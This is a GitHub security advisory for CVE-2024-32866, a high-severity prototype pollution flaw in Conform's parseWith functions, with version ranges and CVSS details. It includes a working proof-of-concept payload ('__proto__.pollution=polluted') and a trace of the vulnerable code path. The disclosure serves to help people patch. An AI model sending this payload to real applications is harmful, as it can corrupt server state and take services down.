Skip to content

Conform contains a Prototype Pollution Vulnerability in `parseWith...` function

High severity GitHub Reviewed Published Apr 23, 2024 in edmundhung/conform • Updated Jun 10, 2024

Package

npm @conform-to/dom (npm)

Affected versions

>= 1.0.0, <= 1.1.0
< 0.9.2

Patched versions

1.1.1
0.9.2
npm @conform-to/yup (npm)
>= 1.0.0, <= 1.1.0
< 0.9.2
1.1.1
0.9.2
npm @conform-to/zod (npm)
>= 1.0.0, <= 1.1.0
< 0.9.2
1.1.1
0.9.2

Description

Summary

Conform allows the parsing of nested objects in the form of object.property. Due to an improper implementation of this feature, an attacker can exploit it to trigger prototype pollution by passing a crafted input to parseWith... functions.

PoC

const { parseWithZod } = require('@conform-to/zod');
const { z } = require("zod"); 

const param = new URLSearchParams("__proto__.pollution=polluted");
const schema = z.object({ "a": z.string() });

parseWithZod(param, { schema });
console.log("pollution:", ({}).pollution); // should print "polluted"

Details

The invocation of the parseWithZod function in the above PoC triggers the setValue function through getSubmissionContext and parse, executing the following process, resulting in prototype pollution:

let pointer = value;

pointer.__proto__ = pointer.__proto__;
pointer = pointer.__proto__;

pointer.polluted = "polluted";

This is caused by the lack of object existence checking on line 117 in formdata.ts, where the code only checks for the presence of pointer[key] without proper validation.

Impact

Applications that use conform for server-side validation of form data or URL parameters are affected by this vulnerability.

References

@edmundhung edmundhung published to edmundhung/conform Apr 23, 2024
Published by the National Vulnerability Database Apr 23, 2024
Published to the GitHub Advisory Database Apr 23, 2024
Reviewed Apr 23, 2024
Last updated Jun 10, 2024

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
Low
Integrity
Low
Availability
High

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H

EPSS score

0.045%
(16th percentile)

Weaknesses

CVE ID

CVE-2024-32866

GHSA ID

GHSA-624g-8qjg-8qxf

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.